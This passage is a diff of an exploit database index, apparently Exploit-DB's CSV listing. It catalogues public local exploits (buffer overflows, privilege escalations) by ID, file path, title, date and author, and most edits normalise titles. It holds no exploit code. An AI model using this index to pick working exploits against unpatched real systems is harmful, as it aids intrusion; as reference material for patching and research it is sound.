3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",local,windows, 19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux, 19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,local,sco, -19364,exploits/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,local,netware, 19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",local,linux, 19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],local,linux, 19371,exploits/linux/local/19371.c,"VMware 1.0.1 - Local Buffer Overflow",1999-06-25,funkysh,local,linux, @@ -7564,7 +7565,7 @@ id,file,description,date,author,type,platform,port 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple, 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple, 19556,exploits/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",local,multiple, -19565,exploits/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation",1999-10-22,"Brock Tellier",local,linux, +19565,exploits/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Local Privilege Escalation",1999-10-22,"Brock Tellier",local,linux, 19673,exploits/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",local,windows, 19674,exploits/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",local,sco, 19676,exploits/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)",2000-05-17,"Brock Tellier",local,linux, @@ -7580,7 +7581,7 @@ id,file,description,date,author,type,platform,port 19641,exploits/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,local,sco, 19642,exploits/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Local Buffer Overflow",1999-11-25,AK,local,sco, 19643,exploits/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,local,sco, -19647,exploits/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation",1999-11-30,UNYUN,local,solaris, +19647,exploits/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Local Privilege Escalation",1999-11-30,UNYUN,local,solaris, 19648,exploits/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,local,solaris, 19649,exploits/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Local Buffer Overflow",1999-12-01,"Brock Tellier",local,freebsd, 19650,exploits/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink",1999-12-01,"Brock Tellier",local,freebsd, @@ -7964,7 +7965,7 @@ id,file,description,date,author,type,platform,port 21288,exploits/multiple/local/21288.txt,"Sawmill 6.2.x - Admin Password Insecure Default Permissions",2002-02-11,darky0da,local,multiple, 21290,exploits/unix/local/21290.sh,"Tarantella Enterprise 3 - Symbolic Link",2002-02-19,"Larry W. Cashdollar",local,unix, 21302,exploits/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",local,linux, -21318,exploits/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,local,windows, +21318,exploits/windows/local/21318.pl,"Internet Download Manager - Local Stack Buffer Overflow",2012-09-14,Dark-Puzzle,local,windows, 21320,exploits/windows/local/21320.pl,"Internet Download Manager - Local Buffer Overflow (SEH)",2012-09-14,Dark-Puzzle,local,windows, 21323,exploits/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",local,linux, 21331,exploits/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",local,windows, @@ -8047,7 +8048,7 @@ id,file,description,date,author,type,platform,port 21761,exploits/linux/local/21761.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)",2002-08-28,RaiSe,local,linux, 21762,exploits/linux/local/21762.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)",2002-08-28,"David Endler",local,linux, 21763,exploits/linux/local/21763.txt,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)",2002-08-28,syscalls,local,linux, -21771,exploits/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation",2002-09-04,eSDee,local,unix, +21771,exploits/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow / Local Privilege Escalation",2002-09-04,eSDee,local,unix, 21772,exploits/unix/local/21772.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,local,unix, 21773,exploits/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,local,unix, 21774,exploits/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,local,unix, @@ -8196,7 +8197,7 @@ id,file,description,date,author,type,platform,port 22965,exploits/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Local Buffer Overflow",2003-07-28,c0wboy,local,linux, 22923,exploits/unix/local/22923.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (1)",2003-07-16,DVDMAN,local,unix, 22924,exploits/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Privilege Escalation (2)",2003-07-16,nic,local,unix, -22928,exploits/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,local,linux, +22928,exploits/linux/local/22928.pl,"mcrypt 2.5.8 - Local Stack Overflow",2012-11-26,Tosh,local,linux, 22931,exploits/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct RETN",2012-11-26,Nezim,local,windows, 22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows, 23007,exploits/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,local,windows, @@ -8225,7 +8226,6 @@ id,file,description,date,author,type,platform,port 23126,exploits/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",local,linux, 23141,exploits/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass",2003-09-15,Texonet,local,sco, 23143,exploits/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,local,sco, -23154,exploits/linux/local/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",local,linux, 23168,exploits/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",local,linux, 23189,exploits/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,local,linux, 23197,exploits/linux/local/23197.c,"Mah-Jong 1.4 - MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,local,linux, @@ -8303,7 +8303,7 @@ id,file,description,date,author,type,platform,port 24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",local,windows, 24210,exploits/hp-ux/local/24210.pl,"HP-UX 7-11 - X Font Server Local Buffer Overflow",2003-03-10,watercloud,local,hp-ux, 24258,exploits/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation",2013-01-20,LiquidWorm,local,windows, -24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows, +24277,exploits/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)",2004-07-16,bkbll,local,windows, 24278,exploits/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",local,linux, 24293,exploits/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",local,sco, 24335,exploits/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",local,unix, @@ -8345,13 +8345,12 @@ id,file,description,date,author,type,platform,port 25039,exploits/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Local Privilege Escalation",2004-12-20,cees-bart,local,aix, 25040,exploits/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",local,php, 25055,exploits/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,local,osx, -25080,exploits/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities",2005-02-02,"Niels Heinen",local,linux, 25106,exploits/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",local,linux, 25130,exploits/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows, 25131,exploits/windows/local/25131.py,"WinArchiver 3.2 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows, 25134,exploits/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,local,linux, 25141,exploits/windows/local/25141.rb,"AudioCoder 0.8.18 - Local Buffer Overflow (SEH)",2013-05-02,metacom,local,windows, -25202,exploits/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1)",2005-03-09,sd,local,linux, +25202,exploits/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1)",2005-03-09,sd,local,linux, 25204,exploits/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow",2013-05-04,"Julien Ahrens",local,windows, 25256,exploits/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,local,osx, 25288,exploits/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)",2005-04-08,qobaiashi,local,linux, @@ -8393,7 +8392,7 @@ id,file,description,date,author,type,platform,port 26218,exploits/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,local,linux, 26222,exploits/windows/local/26222.c,"Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",local,windows, 26242,exploits/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Local Buffer Overflow (SEH)",2013-06-17,Onying,local,windows, -26245,exploits/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,local,windows, +26245,exploits/windows/local/26245.py,"Winamp 5.12 - '.m3u' Local Stack Buffer Overflow",2013-06-17,superkojiman,local,windows, 26321,exploits/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",local,linux, 26323,exploits/windows/local/26323.cpp,"Microsoft Windows XP - Wireless Zero Configuration Service Information Disclosure",2005-10-04,"Laszlo Toth",local,windows, 26352,exploits/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass",2005-10-17,anonymous,local,php, @@ -8412,12 +8411,13 @@ id,file,description,date,author,type,platform,port 26454,exploits/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,local,freebsd, 26479,exploits/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,local,windows, 26492,exploits/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",local,linux, +26497,exploits/windows/local/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' Local Stack Buffer Overflow",2005-11-10,nolimit,local,windows, 26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",local,linux, 26520,exploits/windows/local/26520.py,"Static HTTP Server 1.0 - Local Overflow (SEH)",2013-07-01,"Jacob Holcomb",local,windows, 26523,exploits/windows/local/26523.rb,"AudioCoder (.lst) - Local Buffer Overflow (Metasploit)",2013-07-01,Asesino04,local,windows, 26525,exploits/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Local Buffer Overflow (SEH)",2013-07-01,MrXors,local,windows, 26554,exploits/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)",2013-07-02,Metasploit,local,windows, -28085,exploits/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite",2013-09-04,blake,local,windows, +28085,exploits/windows/local/28085.html,"KingView 6.53 - 'KChartXY' ActiveX File Creation / Overwrite",2013-09-04,blake,local,windows, 26579,exploits/windows/local/26579.rb,"ABBS Audio Media Player - '.LST' Local Buffer Overflow (Metasploit)",2013-07-03,Metasploit,local,windows, 26703,exploits/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption",2013-07-08,feliam,local,windows, 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows, @@ -8425,13 +8425,13 @@ id,file,description,date,author,type,platform,port 26752,exploits/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,local,windows, 26753,exploits/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,local,unix, 26805,exploits/windows/local/26805.rb,"Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,local,windows, -26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow",2013-07-16,PuN1sh3r,local,windows, +26889,exploits/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow",2013-07-16,PuN1sh3r,local,windows, 40385,exploits/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)",2016-09-15,Metasploit,local,netbsd_x86, 26950,exploits/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,local,windows, 26970,exploits/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",local,windows, 26996,exploits/aix/local/26996.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration",2005-12-30,xfocus,local,aix, 26997,exploits/aix/local/26997.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure",2006-01-01,xfocus,local,aix, -27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow",2013-07-23,jun,local,windows, +27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows, 27056,exploits/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",local,linux, 27057,exploits/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",local,linux, 27065,exploits/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",local,linux, @@ -8544,7 +8544,7 @@ id,file,description,date,author,type,platform,port 30336,exploits/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",local,windows, 30802,exploits/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Local Privilege Escalation",2007-11-24,SoBeIt,local,windows, 30374,exploits/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Local Stack Overflow",2013-12-17,"Arash Allebrahim",local,windows, -30399,exploits/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,local,aix, +30399,exploits/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Buffer Overflow",2007-07-26,qaaz,local,aix, 40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, 40522,exploits/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, 30464,exploits/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",local,linux, @@ -8567,8 +8567,8 @@ id,file,description,date,author,type,platform,port 30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",local,linux, 30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows, 31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",local,windows, -31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows, -31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,local,linux, +31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows, +31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow",2008-02-12,forensec,local,linux, 31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",local,windows, 31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,local,linux, 31347,exploits/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)",2014-02-02,rebel,local,lin_x86-64, @@ -8603,18 +8603,18 @@ id,file,description,date,author,type,platform,port 32156,exploits/qnx/local/32156.txt,"QNX 6.4.x/6.5.x pppoectl - Information Disclosure",2014-03-10,cenobyte,local,qnx, 32158,exploits/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,local,windows, 32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows, -32261,exploits/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",local,windows, +32261,exploits/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow",2014-03-14,"Necmettin COSKUN",local,windows, 32343,exploits/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,local,php, 32358,exploits/windows/local/32358.pl,"MP3Info 0.8.5a - Local Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",local,windows, 32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware, 32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",local,linux, 32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",local,multiple, -32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation",2008-11-07,alex,local,windows, +32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation",2008-11-07,alex,local,windows, 32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,local,windows, 32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",local,windows, 32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php, 32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,local,linux, -32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows, +32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows, 32751,exploits/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",local,lin_x86-64, 32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,local,windows, 32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",local,windows, @@ -8681,12 +8681,12 @@ id,file,description,date,author,type,platform,port 34167,exploits/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,local,win_x86, 34267,exploits/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",local,linux, 40917,exploits/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - Local Buffer Overflow (SEH)",2016-12-15,malwrforensics,local,windows, -34272,exploits/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation",2014-08-05,"ryujin & sickness",local,windows, +34272,exploits/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Local Privilege Escalation",2014-08-05,"ryujin & sickness",local,windows, 34311,exploits/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",local,solaris, 34313,exploits/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",local,solaris, 34314,exploits/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",local,solaris, 34333,exploits/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Local Privilege Escalation (Metasploit)",2014-08-13,Metasploit,local,windows, -34331,exploits/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow",2014-08-12,"Giovanni Bartolomucci",local,windows, +34331,exploits/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack Buffer Overflow",2014-08-12,"Giovanni Bartolomucci",local,windows, 34421,exploits/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One",2014-08-27,"taviso & scarybeasts",local,linux, 34489,exploits/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,local,windows, 34512,exploits/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,local,windows, @@ -8732,6 +8732,7 @@ id,file,description,date,author,type,platform,port 35661,exploits/windows/local/35661.txt,"Microsoft Windows 8.1 (x86/x64) - 'ahcache.sys' NtApphelpCacheControl Privilege Escalation",2015-01-01,"Google Security Research",local,windows, 35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows, 35681,exploits/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",local,linux, +35714,exploits/windows/local/35714.pl,"BlueVoda Website Builder 11 - '.bvp' Local Stack Buffer Overflow",2011-05-09,KedAns-Dz,local,windows, 35712,exploits/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow (Metasploit)",2015-01-06,Metasploit,local,windows, 35711,exploits/android/local/35711.c,"Nexus 5 Android 5.0 - Local Privilege Escalation",2015-01-06,retme,local,android, 35732,exploits/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,local,multiple, @@ -8743,7 +8744,7 @@ id,file,description,date,author,type,platform,port 35811,exploits/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - User Profile Service Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",local,windows, 35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows, 35813,exploits/windows/local/35813.py,"Congstar Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows, -35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",local,windows, +35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Local Stack Buffer Overflow",2015-01-16,"Osanda Malith",local,windows, 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, 35994,exploits/windows/local/35994.c,"BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, 35847,exploits/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",local,osx, @@ -8832,7 +8833,7 @@ id,file,description,date,author,type,platform,port 40709,exploits/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation",2016-11-04,"Hector X. Monsegur",local,aix, 37543,exploits/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",local,linux, 37631,exploits/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",local,linux, -37657,exploits/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",local,windows, +37657,exploits/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",local,windows, 37670,exploits/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Local Privilege Escalation",2015-07-22,"Stefan Esser",local,osx, 37699,exploits/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",local,windows, 37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows, @@ -8887,7 +8888,7 @@ id,file,description,date,author,type,platform,port 38287,exploits/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",local,windows, 38289,exploits/windows/local/38289.txt,"Cisco 